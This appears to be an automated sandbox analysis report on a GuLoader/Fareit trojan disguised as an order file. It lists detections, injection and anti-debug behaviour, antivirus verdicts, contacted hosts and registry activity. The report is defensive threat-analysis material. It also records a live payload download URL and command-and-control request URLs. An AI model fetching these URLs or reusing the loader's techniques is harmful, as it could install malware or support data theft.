SHA512 06be8c2f49771d0015b65ecc2ed035e3e73fd33cdf43457d246ffb50a63149abec470afd363cc3e6a3948c4edaad0dc9f2ccbe22c34ae45fbb816f9bf53b4597
CRC32 DC790295
Ssdeep 1536:dDrdLtw+5J/BGPwDwvETDeOeIdD42u/vK:BrdhR7Ec/eOeEh

Signatures

Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 4740 trigged the Yara rule 'shellcode_get_eip'
Hit: PID 4740 trigged the Yara rule 'shellcode_patterns'
Hit: PID 4740 trigged the Yara rule 'GuLoader'
Creates RWX memory
NtSetInformationThread: attempt to hide thread from debugger
Possible date expiration check, exits too soon after checking local time
process: Sri Lank Inquiry Order.pif, PID 4740
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDOrCLSIDToTypeLibrary
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: asycfilt.dll/FilterCreateInstance
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: VERSION.DLL/VerQueryValueA
DynamicLoader: VERSION.DLL/GetFileVersionInfoSizeA
DynamicLoader: VERSION.DLL/GetFileVersionInfoA
DynamicLoader: kernel32.dll/GetCalendarInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/#2 (SysAllocString)
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/#6 (SysFreeString)
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
HTTPS urls from behavior.
URL: http://ratamodu.ga/~zadmin/group/apsfb_BwRMswJ149.bin
CAPE extracted potentially suspicious content
Sri Lank Inquiry Order.pif: Injected PE Image: 32-bit DLL
Sri Lank Inquiry Order.pif: Injected Shellcode/Data
Sri Lank Inquiry Order.pif: GuLoader
Sri Lank Inquiry Order.pif: Injected PE Image: 32-bit executable
Sri Lank Inquiry Order.pif: Unpacked Shellcode
Multiple direct IP connections
direct_ip_connections: Made direct connections to 7 unique IP addresses (the Direct=Y rows of the Hosts table: the two DNS resolvers 8.8.8.8 and 1.1.1.1 plus five addresses that never appear in the DNS table; none of the three hosts the sample resolved by name for its HTTP requests is among them, so this count does not describe the C2 flows)
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.thetoptitle.com/c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4
suspicious_request: http://www.barsoum.dentist/c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1
suspicious_request: http://www.barsoum.dentist/c216/
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1 (reported twice by the sandbox; the UDP table records only plain DNS to 1.1.1.1 on port 53, so the hit is on the resolver's address, not on any observed DoH/DoT session)
Performs some HTTP requests
url: http://ratamodu.ga/~zadmin/group/apsfb_BwRMswJ149.bin
url: http://www.thetoptitle.com/c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4
url: http://www.barsoum.dentist/c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1
url: http://www.barsoum.dentist/c216/
Unconventional language used in binary resources: Catalan (the RT_VERSION resource is tagged LANG_CATALAN and its VS_VERSION_INFO translation block is 040304B0, i.e. LANGID 0x0403 Catalan with code page 0x04B0 Unicode)
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error: File not valid: C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif
Behavioural detection: Injection (Process Hollowing)
Injection: Sri Lank Inquiry Order.pif(4740) -> Sri Lank Inquiry Order.pif(4088)
Executed a process and injected code into it, probably while unpacking
Injection: Sri Lank Inquiry Order.pif(4740) -> Sri Lank Inquiry Order.pif(4088)
Behavioural detection: Injection (inter-process)
File has been identified by 20 Antiviruses on VirusTotal as malicious
McAfee: Fareit-FST!3F2FD6C7F273
Cylance: Unsafe
Sangfor: Malware
F-Prot: W32/VBKrypt.AMM.gen!Eldorado
APEX: Malicious
Kaspersky: UDS:DangerousObject.Multi.Generic
Paloalto: generic.ml
Endgame: malicious (high confidence)
Fortinet: W32/Agent.HKMB!tr
Trapmine: malicious.high.ml.score
Cyren: W32/VBKrypt.AMM.gen!Eldorado
ViRobot: Trojan.Win32.Guloader.81920.G
ZoneAlarm: UDS:DangerousObject.Multi.Generic
Microsoft: PWS:Win32/Fareit.AB!MTB
BitDefenderTheta: Gen:[email protected]
Malwarebytes: Trojan.MalPack.VB
ESET-NOD32: a variant of Win32/Injector.EMGX
Rising: Downloader.Guloader!1.C738 (CLASSIC)
SentinelOne: DFI - Suspicious PE
eGambit: Unsafe.AI_Score_100%
Attempts to modify proxy settings (the only Internet Settings writes recorded under Summary are the HKCU ...\Internet Settings\Wpad\...\WpadDecision* cache values, which Windows' WinHTTP auto-proxy (WPAD) detection writes itself on first network use; on its own this hit does not show a proxy being configured)
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - RigEK
signature: ET JA3 Hash - Possible Malware - Various Eitest
note: both rules match only the JA3 fingerprint of the TLS ClientHello, which is a property of the client's TLS stack rather than of this sample; every TLS (port 443) flow in the TCP table goes to an address outside the three HTTP C2 hosts (84.38.181.216, 23.227.38.64, 184.168.221.40), so treat these two hits as low confidence unless the destination is itself suspicious

Hosts

Direct IP Country Name
Y 23.211.5.239 Netherlands
N 84.38.181.216 Russian Federation
Y 8.8.8.8 United States
Y 72.21.91.29 United States
Y 52.114.128.43 United States
N 23.227.38.64 Canada
Y 184.51.9.166 United States
N 184.168.221.40 United States
Y 172.217.16.142 United States
Y 1.1.1.1 Australia

DNS

Name Response Post-Analysis Lookup
ratamodu.ga A 84.38.181.216 84.38.181.216
www.mums-in.net NXDOMAIN
www.thetoptitle.com A 23.227.38.64 23.227.38.64
www.outdoorbusters.info
www.jqrsky.com
www.pbrgen.com
www.barsoum.dentist A 184.168.221.40 184.168.221.34
www.sixouyo.com

Summary

Files

C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif.cfg
C:\Windows\sysnative\C_932.NLS
C:\Windows\sysnative\C_949.NLS
C:\Windows\sysnative\C_950.NLS
C:\Windows\sysnative\C_936.NLS
C:\Users\Louise\AppData\Local\Temp\~DFB1B9194643FC134C.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\SysWOW64\msvbvm60.dll
C:\Windows\SysWOW64\ntdll.dll
Read Files

C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Louise\AppData\Local\Temp\~DFB1B9194643FC134C.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\SysWOW64\msvbvm60.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Users\Louise\AppData\Local\Temp\~DFB1B9194643FC134C.TMP
Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT\UserEra
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\startbogstavs\Caponized9
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Tuberculomas\Coatninger
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Read Keys

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Write Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
Resolved APIs

kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
cryptbase.dll.SystemFunction036
oleaut32.dll.OleLoadPictureEx
oleaut32.dll.DispCallFunc
oleaut32.dll.LoadTypeLibEx
oleaut32.dll.UnRegisterTypeLib
oleaut32.dll.CreateTypeLib2
oleaut32.dll.VarDateFromUdate
oleaut32.dll.VarUdateFromDate
oleaut32.dll.GetAltMonthNames
oleaut32.dll.VarNumFromParseNum
oleaut32.dll.VarParseNumFromStr
oleaut32.dll.VarDecFromR4
oleaut32.dll.VarDecFromR8
oleaut32.dll.VarDecFromDate
oleaut32.dll.VarDecFromI4
oleaut32.dll.VarDecFromCy
oleaut32.dll.VarR4FromDec
oleaut32.dll.GetRecordInfoFromTypeInfo
oleaut32.dll.GetRecordInfoFromGuids
oleaut32.dll.SafeArrayGetRecordInfo
oleaut32.dll.SafeArraySetRecordInfo
oleaut32.dll.SafeArrayGetIID
oleaut32.dll.SafeArraySetIID
oleaut32.dll.SafeArrayCopyData
oleaut32.dll.SafeArrayAllocDescriptorEx
oleaut32.dll.SafeArrayCreateEx
oleaut32.dll.VarFormat
oleaut32.dll.VarFormatDateTime
